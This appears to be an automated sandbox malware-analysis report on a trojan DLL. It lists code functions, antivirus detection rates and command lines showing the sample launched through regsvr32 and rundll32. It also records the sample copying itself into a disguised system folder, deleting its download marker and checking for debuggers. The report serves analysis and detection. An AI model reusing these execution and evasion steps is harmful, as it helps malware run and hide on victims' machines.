Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C93EE9	4_2_04C93EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C900EF	4_2_04C900EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8E4E5	4_2_04C8E4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7F0E9	4_2_04C7F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8BEFD	4_2_04C8BEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C83EAA	4_2_04C83EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C936AA	4_2_04C936AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C71CA1	4_2_04C71CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8A2A5	4_2_04C8A2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7BAA9	4_2_04C7BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C80ABA	4_2_04C80ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C946BD	4_2_04C946BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C80EBC	4_2_04C80EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7C6B8	4_2_04C7C6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7A445	4_2_04C7A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C77442	4_2_04C77442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7E640	4_2_04C7E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8F840	4_2_04C8F840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C84244	4_2_04C84244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C82E5D	4_2_04C82E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C93263	4_2_04C93263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C90A64	4_2_04C90A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8567B	4_2_04C8567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7A871	4_2_04C7A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8DC71	4_2_04C8DC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8A474	4_2_04C8A474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C77E79	4_2_04C77E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C77078	4_2_04C77078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C89A01	4_2_04C89A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C88806	4_2_04C88806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7B820	4_2_04C7B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C73431	4_2_04C73431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8FBDE	4_2_04C8FBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7E7DE	4_2_04C7E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8C5D5	4_2_04C8C5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C867E6	4_2_04C867E6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8E1F8	4_2_04C8E1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C827F9	4_2_04C827F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C755FF	4_2_04C755FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C74BFC	4_2_04C74BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C807F4	4_2_04C807F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C89DF5	4_2_04C89DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7FB8E	4_2_04C7FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7238C	4_2_04C7238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C83D85	4_2_04C83D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C80F86	4_2_04C80F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C86187	4_2_04C86187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C72194	4_2_04C72194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C907AA	4_2_04C907AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C777A3	4_2_04C777A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C88FAE	4_2_04C88FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8D1BC	4_2_04C8D1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7BFBE	4_2_04C7BFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C757B8	4_2_04C757B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7D14C	4_2_04C7D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C87D5B	4_2_04C87D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C92D53	4_2_04C92D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7F369	4_2_04C7F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C85779	4_2_04C85779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8437A	4_2_04C8437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C8017B	4_2_04C8017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C84F74	4_2_04C84F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C89774	4_2_04C89774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C76B7A	4_2_04C76B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C92B09	4_2_04C92B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7EF0C	4_2_04C7EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C85515	4_2_04C85515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C88D3D	4_2_04C88D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C85333	4_2_04C85333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C71F38	4_2_04C71F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B2009	5_2_041B2009
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A7A0F	5_2_041A7A0F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04198636	5_2_04198636
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419DE74	5_2_0419DE74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A4A66	5_2_041A4A66
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419670B	5_2_0419670B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AAD08	5_2_041AAD08
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AFF58	5_2_041AFF58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A654A	5_2_041A654A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A2142	5_2_041A2142
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419C5D8	5_2_0419C5D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AEFDD	5_2_041AEFDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A9A01	5_2_041A9A01
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A8806	5_2_041A8806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04193431	5_2_04193431
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419B820	5_2_0419B820
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A2E5D	5_2_041A2E5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AB257	5_2_041AB257
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419E640	5_2_0419E640
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AF840	5_2_041AF840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04197442	5_2_04197442
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419A445	5_2_0419A445
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A4244	5_2_041A4244
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04197E79	5_2_04197E79
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04197078	5_2_04197078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A567B	5_2_041A567B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419A871	5_2_0419A871
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041ADC71	5_2_041ADC71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AA474	5_2_041AA474
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B3263	5_2_041B3263
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B0A64	5_2_041B0A64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A0ABA	5_2_041A0ABA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419C6B8	5_2_0419C6B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B46BD	5_2_041B46BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A0EBC	5_2_041A0EBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A3EAA	5_2_041A3EAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419BAA9	5_2_0419BAA9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B36AA	5_2_041B36AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04191CA1	5_2_04191CA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AA2A5	5_2_041AA2A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AD8DB	5_2_041AD8DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041ACCD9	5_2_041ACCD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041ACAD5	5_2_041ACAD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041980C0	5_2_041980C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041ABEFD	5_2_041ABEFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419F0E9	5_2_0419F0E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B3EE9	5_2_041B3EE9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B00EF	5_2_041B00EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AE4E5	5_2_041AE4E5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A5515	5_2_041A5515
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B2B09	5_2_041B2B09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419EF0C	5_2_0419EF0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04191F38	5_2_04191F38
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A8D3D	5_2_041A8D3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A5333	5_2_041A5333
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A7D5B	5_2_041A7D5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B2D53	5_2_041B2D53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AE955	5_2_041AE955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419D14C	5_2_0419D14C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A437A	5_2_041A437A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A017B	5_2_041A017B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A5779	5_2_041A5779
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04196B7A	5_2_04196B7A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A4F74	5_2_041A4F74
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A9774	5_2_041A9774
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419F369	5_2_0419F369
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04192194	5_2_04192194
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419238C	5_2_0419238C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419FB8E	5_2_0419FB8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A0F86	5_2_041A0F86
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A6187	5_2_041A6187
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A3D85	5_2_041A3D85
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041957B8	5_2_041957B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AD1BC	5_2_041AD1BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B17BD	5_2_041B17BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419BFBE	5_2_0419BFBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041B07AA	5_2_041B07AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A8FAE	5_2_041A8FAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041977A3	5_2_041977A3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AFBDE	5_2_041AFBDE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419E7DE	5_2_0419E7DE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AC5D5	5_2_041AC5D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041AE1F8	5_2_041AE1F8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A27F9	5_2_041A27F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A85FF	5_2_041A85FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04194BFC	5_2_04194BFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041955FF	5_2_041955FF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A07F4	5_2_041A07F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A9DF5	5_2_041A9DF5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_041A67E6	5_2_041A67E6

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 10017BC1 appears 68 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 1001984C appears 48 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10017BC1 appears 68 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001984C appears 48 times

Source: CSxylfUJcL.dll

Binary or memory string: OriginalFilenameUDPTool.EXE: vs CSxylfUJcL.dll

Source: CSxylfUJcL.dll

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: CSxylfUJcL.dll	Virustotal: Detection: 21%
Source: CSxylfUJcL.dll	ReversingLabs: Detection: 32%

Source: CSxylfUJcL.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\CSxylfUJcL.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CSxylfUJcL.dll,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ovttmq\chwg.qvw",xKUTPckNvcwxvZR
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ovttmq\chwg.qvw",DllRegisterServer
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\CSxylfUJcL.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\CSxylfUJcL.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ovttmq\chwg.qvw",xKUTPckNvcwxvZR	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ovttmq\chwg.qvw",DllRegisterServer	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal96.troj.evad.winDLL@22/7@0/29

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_100126F9 FindResourceA,LoadResource,LockResource,FreeResource,

2_2_100126F9

Source: C:\Windows\SysWOW64\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: CSxylfUJcL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CSxylfUJcL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CSxylfUJcL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CSxylfUJcL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CSxylfUJcL.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10019891 push ecx; ret	2_2_100198A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10017C60 push ecx; ret	2_2_10017C73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B81195 push cs; iretd	2_2_04B81197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10019891 push ecx; ret	3_2_100198A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10017C60 push ecx; ret	3_2_10017C73
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C01195 push cs; iretd	3_2_04C01197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C71195 push cs; iretd	4_2_04C71197
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_04191195 push cs; iretd	5_2_04191197

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10023A79 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

2_2_10023A79

Source: CSxylfUJcL.dll

Static PE information: real checksum: 0x66354 should be: 0x71965

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\CSxylfUJcL.dll

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Ovttmq\chwg.qvw

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ovttmq\chwg.qvw:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Abljunuakaktiaef\sdkjkrifiykc.rkg:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,	2_2_1000D804
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	2_2_10008B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1000D804 IsIconic,GetWindowPlacement,GetWindowRect,	3_2_1000D804
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10008B90 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,	3_2_10008B90

Source: C:\Windows\SysWOW64\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\svchost.exe TID: 4996	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6896	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7100	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\rundll32.exe	API coverage: 5.0 %

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_2-21717
Source: C:\Windows\SysWOW64\rundll32.exe	API call chain: ExitProcess graph end node			graph_3-21717

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: svchost.exe, 00000018.00000002.863191376.000001B96A062000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000015.00000002.501016331.000002DCEF4C6000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.500795053.000002DCEF470000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.501039542.000002DCEF4EA000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.862775563.000001B96482A000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.863177816.000001B96A055000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_1001C49A

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_10023A79

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_100178B6 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,

2_2_100178B6

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_04B8F7F7 mov eax, dword ptr fs:[00000030h]	2_2_04B8F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_04C0F7F7 mov eax, dword ptr fs:[00000030h]	3_2_04C0F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_04C7F7F7 mov eax, dword ptr fs:[00000030h]	4_2_04C7F7F7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_0419F7F7 mov eax, dword ptr fs:[00000030h]	5_2_0419F7F7

Source: C:\Windows\System32\loaddll32.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_1001C49A
